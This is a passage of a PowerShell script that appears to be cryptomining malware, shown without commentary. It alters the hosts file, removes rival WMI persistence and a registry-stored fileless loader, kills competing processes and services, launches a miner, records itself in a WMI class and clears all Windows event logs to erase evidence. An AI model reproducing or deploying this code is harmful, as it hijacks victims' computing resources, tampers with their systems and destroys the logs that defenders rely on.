{ $Temp += "0.7.4.8 $d`r`n" } Set-Content $Hosts $Temp -Force -EA 0 } } Function WMI_ClearWmiObject { $MatchName = 'PowerShell Event' Get-WmiObject -Namespace root\Subscription -Class __EventFilter | Where-Object {$_.Name -NotMatch $MatchName} | Remove-WmiObject Get-WmiObject -Namespace root\Subscription -Class CommandLineEventConsumer | Where-Object {$_.Name -NotMatch $MatchName} | Remove-WmiObject Get-WmiObject -Namespace root\Subscription -Class __FilterToConsumerBinding | Where-Object {$_.Filter -NotMatch $MatchName} | Remove-WmiObject if ((Get-ItemProperty HKLM:\SYSTEM).AppInfo -Ne $Null) { Remove-ItemProperty -Path HKLM:\SYSTEM -Name 'AppInfo' -EA 0 } Get-Process -Name ScrCons -EA 0 | Stop-Process -Force $Null = Get-WmiObject -Class Win32_Process | Where-Object {($_.Name -Eq "PowerShell.exe") -And ( $_.CommandLine -Like '*WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAGIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAASABLAEwATQA6AFwAUwBZAFMAVABFAE0AKQAuAEEAcABwAEkAbgBmAG8AKQApAC4ARQBuAHQAcgB5AFAAbwBpAG4AdAAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABuAHUAbABsACkA*')} | Invoke-WmiMethod -Name Terminate } Function WMI_Main { Write-Host "[i] Process Id is $mPId/$nPId" WMI_ClearWmiObject WMI_CheckFile WMI_CheckHosts WMI_KillFake WMI_KillService WMI_Killer WMI_Scanner $Test = Get-WmiObject -Class Win32_Process | Where-Object {($_.Name -Eq $FileName) -And (($_.ProcessId -Eq $mPId) -Or ($_.Path -Eq $InstallPath))} if ($Test -Eq $Null) { Write-Host "[-] Process is Not Exists" WMI_StartMiner } else { $ProcessId = $($Test.ProcessId) Write-Host "[+] Process Already Exists, Process Id is $ProcessId" $Wmi=New-Object Management.ManagementClass($WmiName) $Wmi.SetPropertyValue('mPId',$ProcessId) $Null=$Wmi.Put() } WMI_CheckFile Get-EventLog -List | ForEach-Object { Clear-EventLog $_.Log } } $Start = Get-Date WMI_Main $End = Get-Date Write-Host -ForegroundColor Red('Processed in '+($End-$Start).TotalSeconds+' second(s)')